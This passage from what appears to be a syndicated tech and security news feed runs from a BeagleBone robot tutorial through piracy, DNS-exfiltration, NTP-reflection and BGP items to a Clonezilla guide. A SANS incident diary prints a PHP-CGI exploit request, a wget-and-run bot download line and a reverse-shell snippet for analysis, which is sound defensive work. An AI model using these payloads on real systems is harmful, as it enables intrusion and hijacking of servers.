	if( heading >= 95 )
	    leftv = 0;
	else
	    leftv *= 1 - (heading-50)/50;
    }
    if( heading < 50 )
    {
	if( heading <= 5 )
	    rightv = 0;
	else
	    rightv *= 1 - (50-heading)/50;
    }
    console.log("setSpeed v:" + v + " leftv:" + leftv + " rightv:" + rightv );
    this.setPWM( TerryTee.leftPWMpin,  leftv );
    this.setPWM( TerryTee.rightPWMpin, rightv );
    TerryTee.speed = v;
};

The server itself creates a TerryTee object and then offers a Web socket to control that Terry. The ‘stop’ message is intended as an emergency stop which forces Terry to stop moving and ignore input for a period of time so that you can get to it and disable the power in case something has gone wrong.

var terry = new TerryTee('P8_46', 'P8_45', 1.0, 0.97 );
terry.setSpeed( 0 );
terry.setHeading( 50 );
b.pinMode     ('P8_37', b.OUTPUT);
b.pinMode     ('P8_38', b.OUTPUT);
b.pinMode     ('P8_39', b.OUTPUT);
b.pinMode     ('P8_40', b.OUTPUT);
b.digitalWrite('P8_37', b.HIGH);
b.digitalWrite('P8_38', b.HIGH);
b.digitalWrite('P8_39', b.LOW);
b.digitalWrite('P8_40', b.LOW);
io.sockets.on('connection', function (socket) {
  ...
  socket.on('stop', function (v) {
      terry.setSpeed( 0 );
      terry.setHeading( 0 );
      terry.forceStop();
  });
  socket.on('speed', function (v) {
      console.log('set speed to ', v );
      console.log('set speed to ', v.value );
      if( typeof v.value === 'undefined')
	  return;
      terry.setSpeed( v.value );
  });
  ...

The code on github is likely to evolve over time to move the various fixed cutoff numbers to be configurable and allow Terry to be reversed from the tablet.

The Client (Web page)

To quickly create a Web interface I used Bootstrap and jQuery. If the interface became more advanced then perhaps something like AngularJS would be a better fit. To control the speed and heading with an easy touch interface I also used the bootstrap-slider project.BeagleBone robot web interface

<div class="inner cover">
  <div class="row">
    <div class="col-md-1"><p class="lead">Speed</p></div>
    <div class="col-md-8"><input id="speed" data-slider-id='speedSlider' 
                    type="text" data-slider-min="0" data-slider-max="100" 
                    data-slider-step="1" data-slider-value="0"/></div>
  </div>
  <div class="row">
    <div class="col-md-1"><p class="lead">Heading</p></div>
    <div class="col-md-8"><input id="heading" data-slider-id='headingSlider' 
                    type="text" data-slider-min="0" data-slider-max="100" 
                    data-slider-step="1" data-slider-value="50"/></div>
  </div>
</div>
<div class="inner cover">
    <div class="btn-group">
	<button id="rotateleft" type="button" class="btn btn-default btn-lg" >
	  <span class="glyphicon glyphicon-hand-left"></span>&nbsp;Rot&nbsp;Left</button>
	<button id="straightahead" type="button" class="btn btn-default btn-lg" >
	  <span class="glyphicon glyphicon-arrow-up"></span>&nbsp;Straight&nbsp;ahead</button>
	<button id="rotateright" type="button" class="btn btn-default btn-lg" >
	  <span class="glyphicon glyphicon-hand-right"></span>&nbsp;Rot&nbsp;Right</button>
    </div>
</div>

With those UI elements the hook up to the server is completed using io.connect() to connect a ‘var socket’ back to the BeagleBone Black. The below code sends commands back to the BeagleBone Black as UI elements are adjusted on the page. The rotateleft command is simulated by setting the heading and speed for a few seconds and then stopping everything.

$("#speed").on('slide', function(slideEvt) {
    socket.emit('speed', {
        value: slideEvt.value[0],
        '/end': 'of-message'
    });
});
...
$('#straightahead').on('click', function (e) {
     $('#heading').data('slider').setValue(50);
})
$('#rotateleft').on('click', function (e) {
     $('#heading').data('slider').setValue(0);
     $('#speed').data('slider').setValue(70);
     setTimeout(function() {
        $('#speed').data('slider').setValue(0);
        $('#heading').data('slider').setValue(50);
     }, 2000);
})

The BeagleBone Black runs a Web server offering files from /usr/share/bone101. I found it convenient to put the whole project in /home/xuser/webapps/terry-tee and create a softlink to the project at /usr/share/bone101/terry-tee. This way http://mybeagleip/terry-tee/index.html will load the Web interface on a tablet. Cloud9 will automatically start any Bonescript files contained in /var/lib/cloud9/autorun. So two links setup Cloud9 to both serve the client and automatically start the server Bonescript for you:

root@beaglebone:/var/lib/cloud9/autorun# ls -l
lrwxrwxrwx 1 root root 39 Apr 23 07:02 terry.js -> /home/xuser/webapps/terry-tee/server.js
root@beaglebone:/var/lib/cloud9/autorun# cd /usr/share/bone101/
root@beaglebone:/usr/share/bone101# ls -l terry-tee
lrwxrwxrwx 1 root root 29 Apr 17 05:48 terry-tee -> /home/xuser/webapps/terry-tee

Wrap up

I originally tried to use the GPIO pins P8_41 to 44. I found that if I had wires connected to those ports the BeagleBone Black would not start. I could remove and reapply the wires after startup and things would function as expected. On the other hand, leaving 41-44 unconnected and using 37-40 instead the BeagleBone Black would boot up fine. If you have a problem starting your BeagleBone Black you might be accidentally using a connector that has a reserved function during startup.

While the configuration shown in this article allows control of only the movement of the robot base the same code could easily be extended to control other aspects of the robot you are building. For example, to control an arm attached and be able to move things around from your tablet.

Using a BeagleBone Black to control the robot base gives the robot plenty of CPU performance. This opens the door to using a mounted camera with OpenCV to implement object tracking. For example, the robot can move itself around in order to keep facing you. While the configuration in this article used wifi to connect with the robot, another interesting possibility is to use 3G to connect to a robot that isn’t physically nearby.

The BeagleBone Black can create a great Web-controlled robot and the 3 wheel robot base together with some gearmotors should get you moving fairly easily. Though once you have the base moving around you may find it difficult to resist giving your robot more capabilities!

We would like to thank ServoCity for supplying the 3 wheel robot base, gearmotors, gearbox and servo used in this article.

TorrentFreak: No VPN on Earth Can Protect Careless Pirates

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

pirate-cardLast year, Philip Danks, a man from the West Midlands, UK, went into a local cinema and managed to record the movie Fast and Furious 6. He later uploaded that content to the Internet.

After pleading guilty, this week Wolverhampton Crown Court sentenced him to an unprecedented 33 months in prison.

The Federation Against Copyright Theft are no doubt extremely pleased with this result. After their successful private prosecution, the Hollywood-affiliated anti-piracy group is now able to place Danks’ head on a metaphorical pike, a clear warning to other would-be cammers. But just how difficult was this operation?

There’s often a lot of mystery attached to the investigations process in a case like this. How are individuals like Danks tracked and found? Have FACT placed spies deep into file-sharing sites? Are the authorities sniffing traffic and breaking pirates’ VPN encryption?

Or are they spending half an hour with Google and getting most of it handed to them on a plate? In Danks’ case, that appears to be exactly what happened.

Something that many millions of people use online is a nickname, and Danks was no exception. His online alias in the torrenting scene was TheCod3r, and as shown below it is clearly visible in the release title.

Kick-up

The idea behind aliases is that they provide a way to mask a real name. Military uses aside, adopting an alternative communications identity was something popularized in the 70s with the advent of Citizens Band radio. The practice continues online today, with many people forced to adopt one to register with various services.

However, what many in the file-sharing scene forget is that while aliases on a torrent site might be useful, they become as identifying as a real name when used elsewhere in ‘regular’ life. The screenshot below shows one of Danks’ first huge mistakes.

Fish-Google

Clicking that link on dating site Plenty of Fish (POF) reveals a whole range of information about a person who, at the very least, uses the same online nickname as Danks. There’s no conclusive proof that it’s the same person, but several pieces of information begin to build a picture.

In his POF profile, Danks reveals his city as being Willenhall, a small town situated in an area known locally as the Black Country. What FACT would’ve known soon after the movie leaked online was which cinema it had been recorded in. That turned out to be a Showcase cinema, just a few minutes up the road from Willenhall in the town of Walsall.

Also revealed on Danks’ POF profile is his full name and age. When you have that, plus a town, you can often find a person’s address on the UK’s Electoral Register.

It’s also trivial to find social networking pages. Not only do pictures on Danks’ POF profile match those on his Facebook page, he also has a revealing movie item listed in his interests section.

fb-1

Of course, none of this in itself is enough to build a decent case, but when you have the police on board as FACT did, things can be sped up somewhat. On May 23, 2013 Danks was raided and then, just two days later, he did something quite astonishing.

Posting on his Facebook page, the then 24-year-old took to his Facebook account (he has two) to mock the makers of Fast and Furious 6.

“Seven billion people and I was the first. F*** you Universal Pictures,” he wrote.

Also amazing was Danks’ apparent disregard for the predicament he was in. On May 10, 2013, Danks again took to Facebook, this time to advertise that he was selling copies of movies including Robocop and Captain America.

sale

This continued distribution of copyrighted material particularly aggravated the Court at his sentencing hearing this week, with Danks’ behavior being described as “bold, arrogant and cocksure offending.”

While the list of events above clearly shows a catalog of errors that some might even find amusing, the desire of many pirates to utilize the same nickname across many sites is a common one employed by some of the biggest in the game.

Once these and other similar indicators migrate across into real-life identities and activities (and the ever-present Facebook account of course), joining the dots is not difficult – especially for the police and outfits like FACT. And once that happens, no amount of VPN encryption of lack of logging is going to put the genie back in the bottle.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: Disguising Exfiltrated Data

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s an interesting article on a data exfiltration technique.

What was unique about the attackers was how they disguised traffic between the malware and command-and-control servers using Google Developers and the public Domain Name System (DNS) service of Hurricane Electric, based in Fremont, Calif.

In both cases, the services were used as a kind of switching station to redirect traffic that appeared to be headed toward legitimate domains, such as adobe.com, update.adobe.com, and outlook.com.

[...]

The malware disguised its traffic by including forged HTTP headers of legitimate domains. FireEye identified 21 legitimate domain names used by the attackers.

In addition, the attackers signed the Kaba malware with a legitimate certificate from a group listed as the “Police Mutual Aid Association” and with an expired certificate from an organization called “MOCOMSYS INC.”

In the case of Google Developers, the attackers used the service to host code that decoded the malware traffic to determine the IP address of the real destination and edirect the traffic to that location.

Google Developers, formerly called Google Code, is the search engine’s website for software development tools, APIs, and documentation on working with Google developer products. Developers can also use the site to share code.

With Hurricane Electric, the attacker took advantage of the fact that its domain name servers were configured, so anyone could register for a free account with the company’s hosted DNS service.

The service allowed anyone to register a DNS zone, which is a distinct, contiguous portion of the domain name space in the DNS. The registrant could then create A records for the zone and point them to any IP address.

Honestly, this looks like a government exfiltration technique, although it could be evidence that the criminals are getting even more sophisticated.

LWN.net: Linux Kernel Git Repositories Add 2-Factor Authentication (Linux.com)

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

Linux.com takes
a look
at using 2-factor authentication for commit access to kernel
git repositories. “Having the technology available is one thing, but how to incorporate it into the kernel development process — in a way that doesn’t make developers’ lives painful and unbearable? When we asked them, it became abundantly clear that nobody wanted to type in 6-digit codes every time they needed to do a git remote operation. Where do you draw the line between security and usability in this case?

We looked at the options available in gitolite, the git repository management solution used at kernel.org, and found a way that allowed us to trigger additional checks only when someone performed a write operation, such as “git push.” Since we already knew the username and the remote IP address of the developer attempting to perform a write operation, we put together a verification tool that allowed developers to temporarily whitelist their IP addresses using their 2-factor authentication token.”

SANS Internet Storm Center, InfoCON: green: Part 2: Is your home network unwittingly contributing to NTP DDOS attacks?, (Sun, Aug 17th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

This diary follows from Part 1, published on Sunday August 17, 2014.  

How is it possible that with no port forwarding enabled through the firewall that Internet originated NTP requests were getting past the firewall to the misconfigured NTP server?

The reason why these packets are passing the firewall is because the manufacturer of the gateway router, in this case Pace, implemented full-cone NAT as an alternative to UPnP.

What is full-cone NAT?

The secret is in these settings in the gateway router:

If strict UDP Session Control were enabled the firewall would treat outbound UDP transactions as I described earlier.  When a device on your network initiates an outbound connection to a server responses from that server are permitted back into your network.  Since UDP is stateless most firewalls simulate state with a timeout.  In other words if no traffic is seen between the device and the server for 600 seconds then don’t permit any response from the server until there is new outbound traffic. But anytime related traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate. Visually that looks like:

However if UDP Session Control is disabled, as it is in this device, then this device implements full-cone NAT (RFC 3489). Full-cone NAT allows any external host to use the inbound window opened by the outbound traffic until the timer expires.  

Remember anytime traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate.

The really quick among you will have realized that this is not normally a big problem since the only port exposed is the original ephemeral source port and it is waiting for a NTP reply.  It is not likely to be used as an NTP reflector.  But the design of the NTP protocol can contribute to this problem.

Symmetric Mode NTP

There is a mode of NTP called symmetric NTP in which, instead of the originating device picking an ephemeral port for the outbound connection,  both the source and the destination ports use 123. The traffic flow would look like:

Symmetric NTP opens up the misconfigured server to be an NTP reflector.  Assuming there is an NTP server running on the originating machine on UDP port 123, if an attacker can find this open NTP port before the timeout window closes they can send in NTP queries which will pass the firewall and will be answered by the NTP server.  If the source IP address is spoofed the replies will not go back to the attacker, but will go to a victim instead. 

Of course UDP is stateless so the source IP can be spoofed and there is no way for the receiver of the NTP request to validate the source IP or source port permitting the attacker to direct the attack against any IP and port on the Internet.  It is exceedingly difficult to trace these attacks back to the source so the misconfigured server behind the full-cone NAT will get the blame. As long as the attacker sends at least one packet every 600 seconds he can hold the session open virtually forever and use this device to wreak havoc on unsuspecting victims. We have seen indications of the attackers holding holding these communications open for months.  

What are the lessons to be learned here:

  • If all ISPs fully implemented anti-spoofing filters then the likelihood of this sort of attack is lowered substantially.  In a nutshell anti-spoofing says that if the traffic is headed into my network and the source IP address is from my network then the source IP must be spoofed, so drop the packet.  It also works in the converse.  If a packet is leaving my network and the source IP address is not an IP address from my network then the source IP address must be spoofed, so drop the packet.
  • It can’t hurt to check your network for NTP servers.  A single nmap command will quickly confirm if any are open on your network. nmap -sU  -A -n -PN -pU:123 –script=ntp-monlist .  If you find one or more perhaps you can contact the vendor for possible resolution.
  • If you own a gateway router that implements full-cone NAT you may want to see if your gateway router implements the equivalent of  the Pace “Strict UDP Session Controlâ€�.  This will prevent an attacker from access misconfigured UDP servers on your network. 

– Rick Wanner – rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SANS Internet Storm Center, InfoCON: green: Web Server Attack Investigation – Installing a Bot and Reverse Shell via a PHP Vulnerability, (Sat, Aug 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

With Windows malware getting so much attention nowadays, it’s easy to forget that attackers also target other OS platforms. Let’s take a look at a recent attempt to install an IRC bot written in Perl by exploiting a vulnerability in PHP.

The Initial Probe

The web server received the initial probe from 46.41.128.231, an IP address that at the time was not flagged as malicious on various blacklists:

HEAD / HTTP/1.0

The connection lacked the headers typically present in an HTTP request, which is why the web server’s firewall blocked it with the 403 Forbidden HTTP status code error. However, that response was sufficient for the attacker’s tool to confirm that it located a web server.

The Exploitation Attempt

The offending IP address initiated another connection to the web server approximately 4 hours later. This time, the request was less gentle than the initial probe:

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded

As shown above, the attacking system attempted to access /cgi-bin/php on the targeted server. The parameter supplied to /cgi-bin/php, when converted from hexadecimal into ASCII, corresponded to this:

-dallow_url_include=on-dsafe_mode=off-dsuhosin.simulation=on-ddisable_functions=""-dopen_basedir=none-dauto_prepend_file=php://input-dcgi.force_redirect=0-dcgi.redirect_status_env=0-n

These parameters, when supplied to a vulnerable version of /cgi-bin/php, are designed to dramatically reduce security of the PHP configuration on the system. We covered a similar pattern in our 2012 diary when describing the CVE-2012-1823 vulnerability in PHP. The fix to that vulnerability was poorly implemented, which resulted in the CVE-2012-2311 vulnerability that affected “PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script,” according to MITRE. The ISS advisory noted that,

“PHP could allow a remote attacker to execute arbitrary code on the system, due to an incomplete fix for an error related to parsing PHP CGI configurations. An attacker could exploit this vulnerability to execute arbitrary code on the system.”

SpiderLabs documented a similar exploitation attempt in 2013, where they clarified that “one of the key modifications is to specify ‘auto_prepend_file=php://input‘ which will allow the attacker to send PHP code in the request body.”

The Exploit’s Primary Payload: Downloading a Bot

With the expectation that the initial part of the malicious POST request reconfigured PHP, the body of the request began with the following code:

php system("wget ip-address-redacted/speedtest/.a/hb/phpR05 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7 &"); ?>

If the exploit was successful, code would direct the targeted server to download /.a/hb/phpR05 from the attacker’s server, saving the file as /tmp/.bash_h1s7, then running the file using Perl and then deleting the file. Searching the web for “phpR05″ showed a file with this name being used in various exploitation attempts. One such example was very similar to the incident being described in this diary. (In a strange coincidence, that PHP attack was visible in the data that the server was leaking due to a Heartbleed vulnerability!)

The malicious Perl script was an IRC bot, and was recognized as such by several antivirus tools according to VirusTotal. Here’s a tiny excerpt from its code:

#####################
# Stealth Shellbot  #
#####################

sub getnick {
  return "Rizee|RYN|05|".int(rand(8999)+1000);
}

This bot was very similar to the one described by James Espinosa in 2013 in an article discussing Perl/ShellBot.B trojan activity, which began with attempts to exploit a phpMyAdmin file inclusion vulnerability.

The Exploit’s Secondary Payload: Reverse Shell

In addition to supplying instructions to download the IRC bot, the malicious POST request contained PHP code that implemented a reverse backdoor, directing the targeted web server to establish a connection to the attacker’s server on TCP port 22. That script began like this:

$ip = 'ip-address-redacted';
$port = 22;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';

Though the attacker specified port 22, the reverse shell didn’t use SSH. Instead, it expected the attacker’s server to listen on that port using a simple tool such as Netcat. Experimenting with this script and Netcat in a lab environment confirmed this, as shown in the following screenshot:

In this laboratory experiment, ‘nc -l -p 22‘ directed Netcat to listen for connections on TCP port 22. Once the reverse shell script ran on the system that mimicked the compromised server, the simulated attacker had the ability to run commands on that server (e.g., ‘whoami‘).

Interestingly, the production server’s logs showed that the system in the wild was listening on TCP port 22; however, it was actually running SSH there, so the reverse shell connection established by the malicious PHP script would have failed.

A bit of web searching revealed a script called ap-unlock-v1337.py, reportedly written in 2012 by “noptrix,” which was designed to exploit the PHP vulnerability outlined above. That script included the exact exploit code used in this incident and included the code that implemented the PHP-based reverse shell. The attacker probably used that script with the goal of installing the Perl-based IRC bot, ignoring the reverse shell feature of the exploit.

Wrap Up

The attack, probably implemented using automated script that probed random IP addresses, was designed to build an IRC-based bot network. It targeted Unix systems that ran a version of PHP susceptible to a 2-year-old vulnerability. This recent incident suggests that there are still plenty of unpatched systems left to compromise. The attacker used an off-the-shelf exploit and an unrelated off-the-shelf bot, both of which were readily available on the Internet. The attacker’s infrastructure included 3 different IP addresses, none of which were blacklisted at the time of the incident.

– Lenny Zeltser

Lenny Zeltser focuses on safeguarding customers’ IT operations at NCR Corp. He also teaches how to analyze malware at SANS Institute. Lenny is active on Twitter and . He also writes a security blog, where he recently described other attacks observed on a web server.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: TalkTalk Wants Resellers to Warn Pirating Customers

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

talktalklogoUnlike those in the US, Internet providers in the UK are not obliged to forward copyright infringement notices to their subscribers. This means that local Internet users are spared the typical warnings that are so common elsewhere.

Despite the lacking legal requirements, some anti-piracy groups do send copyright infringement notices to UK ISPs. In most cases these are ignored by the providers, but last week TalkTalk forwarded a notice to one of its resellers.

In the email the ISP asks Opal Solutions to forward the notice in question to one of its subscribers who allegedly shared a pirated copy of “Godzilla”. In addition the reseller was urged to take “preventive” measures, but what these should be is left open.

“Please see below copyright infringement email regarding an IP address of one of your clients, Please inform your client and take necessary preventative measures,” TalkTalk wrote.

At the bottom of this article is a copy of the original copyright infringement notice TalkTalk forwarded. It is a typical DMCA style notice sent by IP Echelon on behalf of Warner Bros.

IP Echelon didn’t make any effort to customize the notice for the UK audience. The email specifically references US copyright law, which doesn’t apply to the reseller or TalkTalk.

What’s most noteworthy, though, is that TalkTalk has decided to pass on this notice. The ISP is not known to forward these notices to its own subscribers, yet they appear to be urging a reseller to go beyond what’s required by law.

The forwarded email is most likely an attempt to avoid any type of liability. The question that remains is this: if TalkTalk do this with resellers does this mean they will start warning their subscribers as well?

Earlier this year the news broke that TalkTalk and other UK providers will voluntarily start sending infringement notices under the VCAP program. While VCAP isn’t going into effect before the summer of 2015, TalkTalk’s forwarded infringement notice could suggest that they might do something sooner.

Below is a full copy of the copyright infringement notice.

—-

We are writing this message on behalf of Warner Bros. Entertainment Inc..

We have received information that an individual has utilized the
below-referenced IP address at the noted date and time to offer
downloads of copyrighted material.

The title in question is: Godzilla

The distribution of unauthorized copies of copyrighted television
programs constitutes copyright infringement under the Copyright Act,
Title 17 United States Code Section 106(3). This conduct may also
violate the laws of other countries, international law, and/or treaty
obligations.

Since you own this IP address
we request that you immediately do the following:

1) Contact the subscriber who has engaged in the conduct described
above and take steps to prevent the subscriber from further downloading
or uploading Warner Bros. Entertainment Inc. content without authorization; and

2) Take appropriate action against the account holder under your Abuse
Policy/Terms of Service Agreement.

On behalf of Warner Bros. Entertainment Inc., owner of the exclusive rights
in the copyrighted material at issue in this notice, we hereby state that
we have a good faith belief that use of the material in the manner
complained of is not authorized by Warner Bros. Entertainment Inc.,
its respective agents, or the law.

Also, we hereby state, under penalty of perjury, that we are authorized
to act on behalf of the owner of the exclusive rights being infringed
as set forth in this notification.

We appreciate your assistance and thank you for your cooperation in this
matter. Your prompt response is requested.

Any further enquiries can be directed to copyright@ip-echelon.com
Please include this message with your enquiry to ensure a swift response.

Respectfully,

Adrian Leatherland
CEO
IP-Echelon
Email: copyright@ip-echelon.com
Address: 6715 Hollywood Blvd, Los Angeles, 90028, United States

- ————- Infringement Details ———————————-
Title: Godzilla
Timestamp: 2014-08-13T14:06:26Z
IP Address:
Port: 60261
Type: BitTorrent
Torrent Hash: c5cdf551eea353484657d45dbe93f688575a1e31
Filename: Godzilla.2014.WEBRiP.XviD-VAiN
Filesize: 2485 MB
- ———————————————————————

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Something is amiss with the Interwebs! BGP is a flapping. , (Tue, Aug 12th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

[Update] See http://www.bgpmon.net/what-caused-todays-internet-hiccup/ for a good summary of what happened.

 

Tuesday Morning, various networks experienced outages from 4-6am EDT (8-10am UTC) [1]. I appears the outage was the result of a somewhat anticipated problem with older routers and their inability to deal with the ever increasing size of the Internet’s routing table.

These BGP routers need to store a map of the internet defining which IP address range belongs to which network. Due to the increasing scarcity of IPv4 space, registrars and ISPs assign smaller and smaller netblocks to customers, leading to a more and more fragmented topology. Many older routers are limited to store 512k entries, and the Internet’s routing table has become large enough to reach this limit. Tuesday morning, it appears to have exceeded this limit for a short time [2][3].

The large number of route announcements, and immediate removals shown in [2] could indicate a malicious intend behind this events (or a simple configuration error), but either way likely point to one entity “pushing” the size of the routing table beyond the 512k limit briefly. At around this time, one larger ISP (Windstream, AS7029) recovered from an unrelated outage and routing changes due to the recovery are one suspect that may have triggered the event.

Vendors published guidance for users of older routers how to avoid this issue [5]. This guidance has been available for a while. Please contact your vendor if you are affected. You may also want to consider upgrading your router. The routing table is likely going to get larger over the next few years until networks rely less on IPv4 and take advantage of IPv6.

 

[1] https://puck.nether.net/pipermail/outages/2014-August/007090.html
[2] http://www.cymru.com/BGP/prefix_delta.html (see the spike in deltas around that time)
[3] 
http://www.cidr-report.org/2.0/#General_Status  (note how close it is to 512k and rising)
[4] 
http://www.thewhir.com/web-hosting-news/liquidweb-among-companies-affected-major-outage-across-us-network-providers
[5] http://www.cisco.com/c/en/us/support/docs/switches/catalyst-6500-series-switches/117712-problemsolution-cat6500-00.html
 

Cheers,

Adrien de Beaupré

Intru-shun.ca Inc.

My SANS Teaching Schedule

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: BTindex Exposes IP-Addresses of BitTorrent Users

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

spyUnless BitTorrent users are taking steps to hide their identities through the use of a VPN, proxy, or seedbox, their downloading habits are available for almost anyone to snoop on.

By design the BitTorrent protocol shares the location of any user in the swarm. After all, without knowing where to send the data nothing can be shared to begin with.

Despite this fairly common knowledge, even some experienced BitTorrent users can be shocked to learn that someone has been monitoring their activities, let alone that their sharing activity is being made public for the rest of the world to see.

Like it or not, this is exactly what the newly launched torrent search engine BTindex is doing.

Unlike most popular torrent sites BTindex adds new content by crawling BitTorrent’s DHT network. This is already quite unique as most other sites get their content from user uploads or other sites. However, the most controversial part without doubt is that the IP-addresses of BitTorrent users are being shared as well.

People who download a file from The Pirate Bay or any other torrent site expose their IP-addresses via the DHT network. BTindex records this information alongside the torrent metadata. The number of peers are displayed in the search results and for each file a selection of IP-addresses is made available to the public.

The image below shows a selection of peers who shared a pirated copy of the movie “Transcendence,” this week’s most downloaded film.

Some IP-addresses sharing “Transcendence.”
btindexips

Perhaps even more worrying to some, the site also gives an overview of all recorded downloads per IP-address. While the database is not exhaustive there is plenty of dirt to be found on heavy BitTorrent users who have DHT enabled in their clients.

Below is an example of the files that were shared via the IP-address of a popular VPN provider.

Files shared by the IP-address of a popular VPN provider
btindexvpnips

Since all data is collected through the DHT network people can avoid being tracked by disabling this feature in their BitTorrent clients. Unfortunately, that only gives a false sense of security as there are plenty of other monitoring firms who track people by gathering IP-addresses directly from the trackers.

The idea to index and expose IP-addresses of public BitTorrent users is not entirely new. In 2011 YouHaveDownloaded did something similar. This site generated considerable interest but was shut down a few months after its launch.

If anything, these sites should act as a wake up call to people who regularly share files via BitTorrent without countermeasures. Depending on the type of files being shared, a mention on BTindex is probably the least of their worries.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Linux How-Tos and Linux Tutorials: How to Image and Clone Hard Drives with Clonezilla

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Carla Schroder. Original post: at Linux How-Tos and Linux Tutorials

fig-1 gparted

Clonezilla is a partition and disk cloning application for Linux, Free-, Net-, and OpenBSD, Mac OS X, Windows, and Minix. It supports all the major filesystems including EXT, NTFS, FAT, XFS, JFS, and Btrfs, LVM2, and VMWare’s enterprise clustering filesystems VMFS3 and VMFS5. Clonezilla supports 32- and 64-bit systems, both legacy and UEFI BIOS, and both MBR and GPT partition tables. It’s a good tool for backing up a complete Windows system with all of your installed applications, and I like it for making copies of Linux test systems so that I can trash them with mad experiments and then quickly restore them.

Clonezilla can also copy unsupported filesystems with the dd command, which copies blocks rather than files, so it doesn’t need to understand filesystems. So, the short story is Clonezilla can copy anything. (A quick note on blocks: disk sectors are the smallest addressable storage units on hard disks, and blocks are logical data structures made up of single or multiple sectors.)

Clonezilla comes in two versions: Clonezilla Live and Clonezilla Server Edition (SE). Clonezilla live is ace for cloning single computers to a local storage device or network share. Clonezilla SE is for larger deployments, and fast multicast cloning an entire network of PCs at once. Clonezilla SE is a wonderful bit of software that we shall cover in the future. Today we shall create a Clonezilla Live USB stick, clone something, and restore it.

Clonezilla and Tuxboot

When you visit the download page you’ll see Stable and Alternative Stable releases. There are also Testing releases, which I recommend if you’re interested in helping to improve Clonezilla. Stable is based on Debian and includes no non-Free software. Alternative Stable is based on Ubuntu, includes some non-Free firmwares, and it supports UEFI Secure Boot.

After you download Clonezilla, install Tuxboot to copy Clonezilla to a USB stick. Tuxboot is a modification of Unetbootin that supports Clonezilla; you can’t use Unetbootin because it won’t work. Installing Tuxboot is a bit of pain, though Ubuntu users can install Tuxboot the easy way from a personal packages archive (PPA):

$ sudo apt-add-repository ppa:thomas.tsai/ubuntu-tuxboot
$ sudo apt-get update
$ sudo apt-get install tuxboot

If you’re not running Ubuntu and your Linux distribution doesn’t include a packaged version of Tuxboot, download the source tarball and follow the instructions in the README.txt file to compile and install it.

Once you get Tuxboot installed, use it to create your nice live bootable Clonezilla USB stick. First create a FAT32 partition of at least 200 megabytes; figure 1 (above) shows how it’s done in GParted. I like to use labels, like “clonezilla”, so I know what it is. This example shows a 2GB stick formatted as a single partition.

Then fire up Tuxboot (figure 2). Check “Pre-downloaded” and click the button with the ellipsis to select your Clonezilla file. It should find your USB stick automatically, and you should check the partition number to make sure it found the right one. In my example that is /dev/sdd1. Click OK, and when it’s finished click Exit. It asks you if you want to reboot now, but don’t worry because it won’t. Now you have a nice portable Clonezilla USB stick you can use almost anywhere.

fig-2-tuxboot

Creating a Drive Image

Boot up your Clonezilla USB stick on the computer that you want to backup, and the first thing you’ll see is a normal-looking boot menu. Boot to the default entry. You’ll be asked language and keyboard questions, and when you arrive at the Start Clonezilla menu select Start Clonezilla. In the next menu select device_image, then go to the next screen.

This screen is a little confusing, with options for local_dev, ssh_server, samba_server, and nfs_server. This is where you select the location for your backup image to be copied to. If you choose local_dev, then you’ll need a local partition with enough room to store your image. An attached USB hard drive is a nice fast and easy option. If you choose any of the server options you’ll need a wired Ethernet connection, the IP address of your server, and your login. I’ll use a local partition, which means selecting local_dev.

